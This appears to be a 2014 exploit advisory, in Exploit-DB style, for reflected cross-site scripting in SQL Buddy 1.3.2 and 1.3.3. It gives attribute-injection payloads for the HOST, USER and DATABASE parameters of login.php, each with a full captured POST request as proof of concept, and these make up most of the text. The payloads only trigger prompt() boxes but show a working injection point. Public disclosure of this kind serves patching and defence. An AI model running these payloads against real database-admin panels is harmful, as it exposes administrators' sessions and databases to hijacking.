Sqlbuddy 1.3.2 / 1.3.3 Cross Site Scripting

`##################################################################################################  
#  
#Exploit Title : Sqlbuddy 1.3.2 & 1.3.3 Reflected Cross-Site Scripting   
#Author : Govind Singh aka NullPort  
#Vendor : http://sqlbuddy.com/  
#Download Link : https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip (Sqlbuddy 1.3.3)  
#Date : 14/07/2014  
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )  
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi  
#Greez to : All IHT Members   
#   
###################################################################################################  
  
about vendor :  
SQL Buddy is an open source web based application written in PHP intended to handle the administration of MySQL and SQLite with the use of a Web browser.   
The project places an emphasis on ease of installation and a simple user interface.  
  
Cross-Site Scripting vulnerability in "login.php" page with parameter "DATABASE" "HOST" & "USER"   
=========== ===========================  
  
HOST Payload : localhost" onmouseover=prompt(955794) bad="  
PoC :  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/sqlbuddy/login.php  
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=101  
POSTDATA=ADAPTER=mysql&HOST=01/01/1967%22%20onmouseover%3dprompt(906831)%20bad%3d%22&USER=root&PASS=&DATABASE=  
-----------------------------------------------------------------------------------------------------------------  
  
USER payload : root" onmouseover=prompt(959474) bad="  
PoC :  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/sqlbuddy/login.php  
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=93  
POSTDATA=ADAPTER=mysql&HOST=01%2F01%2F1967&USER=root" onmouseover=prompt(959474) bad="&PASS=&DATABASE=  
----------------------------------------------------------------------------------------------------------------------  
  
DATABASE pyaload : 01/01/1967" onmouseover=prompt(906831) bad="  
PoC :  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/sqlbuddy/login.php  
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=98  
POSTDATA=ADAPTER=mysql&HOST=localhost&USER=root&PASS=&DATABASE=01/01/1967" onmouseover=prompt(906831) bad="  
------------------------------------------------------------------------------------------------------------------  
`